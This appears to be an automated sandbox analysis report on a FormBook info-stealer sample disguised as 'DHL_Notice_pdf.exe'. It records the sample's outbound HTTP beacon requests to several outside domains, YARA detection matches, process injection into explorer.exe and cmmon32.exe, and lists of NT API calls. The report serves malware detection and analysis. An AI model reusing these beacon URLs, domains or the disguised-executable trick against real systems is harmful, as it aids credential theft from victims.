          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ== HTTP/1.1Host: www.bohndigitaltech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.rifleroofers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ== HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: DHL_Notice_pdf.exe
          Source: initial sampleStatic PE information: Filename: DHL_Notice_pdf.exe
          Source: DHL_Notice_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_004208B7
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 1_2_00420A26
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00405843
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00401801
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00401803
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00401810
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004038C3
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004228C4
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004230E8
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004038B9
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0042219B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00401A65
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00422211
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00421A8C
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00401BA0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_004223BA
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0040561A
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00420623
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00405623
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00422EAB
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0040BFEE
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0040BFF3
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00421F81
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A220A0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC20A8
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0B090
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC28EC
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ACE824
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A830
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB1002
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A199BF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A14120
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009FF900
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC22AE
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4AEF
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AAFA2B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B236
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2EBB0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2138B
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AA23E3
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB03DA
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABDBD2
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A2ABD8
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC2B28
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1A309
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1AB40
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A9CB4F
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB4496
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0841F
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABD466
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A1B477
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A22581
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AB2D82
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A0D5E0
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC25DD
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC2D07
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_009F0D20
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC1D55
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC2EF7
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A16E30
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ABD616
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00AC1FF1
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00ACDFCE
          Source: C:\Windows\explorer.exeCode function: 4_2_0B738F52
          Source: C:\Windows\explorer.exeCode function: 4_2_0B737D42
          Source: C:\Windows\explorer.exeCode function: 4_2_0B735FA2
          Source: C:\Windows\explorer.exeCode function: 4_2_0B734C72
          Source: C:\Windows\explorer.exeCode function: 4_2_0B733279
          Source: C:\Windows\explorer.exeCode function: 4_2_0B737262
          Source: C:\Windows\explorer.exeCode function: 4_2_0B737E62
          Source: C:\Windows\explorer.exeCode function: 4_2_0B732C52
          Source: C:\Windows\explorer.exeCode function: 4_2_0B737E5D
          Source: C:\Windows\explorer.exeCode function: 4_2_0B738202
          Source: C:\Windows\explorer.exeCode function: 4_2_0B739802
          Source: C:\Windows\explorer.exeCode function: 4_2_11944FA2
          Source: C:\Windows\explorer.exeCode function: 4_2_11947F52
          Source: C:\Windows\explorer.exeCode function: 4_2_11946D42
          Source: C:\Windows\explorer.exeCode function: 4_2_11947202
          Source: C:\Windows\explorer.exeCode function: 4_2_11948802
          Source: C:\Windows\explorer.exeCode function: 4_2_11941C52
          Source: C:\Windows\explorer.exeCode function: 4_2_11946E5D
          Source: C:\Windows\explorer.exeCode function: 4_2_11943C72
          Source: C:\Windows\explorer.exeCode function: 4_2_11942279
          Source: C:\Windows\explorer.exeCode function: 4_2_11946262
          Source: C:\Windows\explorer.exeCode function: 4_2_11946E62
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045AD466
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B1D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B2D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044E0D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B25DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044FD5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04512581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A2D82
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045AD616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04506E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B2EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045BDFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B1FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0450A830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045BE824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B28EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044FB090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045120A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B20A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044EF900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04504120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045099BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0459FA2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4AEF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B22AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0450AB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0450A309
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B2B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A03DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045ADBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451ABD8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045923E3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C8D70
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C3A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027CA200
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027E12F5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C1AD0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027E0AD1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C1AC6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027E03A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C3830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DE830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027C3827
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027E10B8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027CA1FB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027E018E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_027DFC99
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: String function: 009FB150 appears 136 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 044EB150 appears 133 times
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041E533 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041E5E3 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041E663 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041E713 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041E52E NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0041E5DD NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A395D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk,
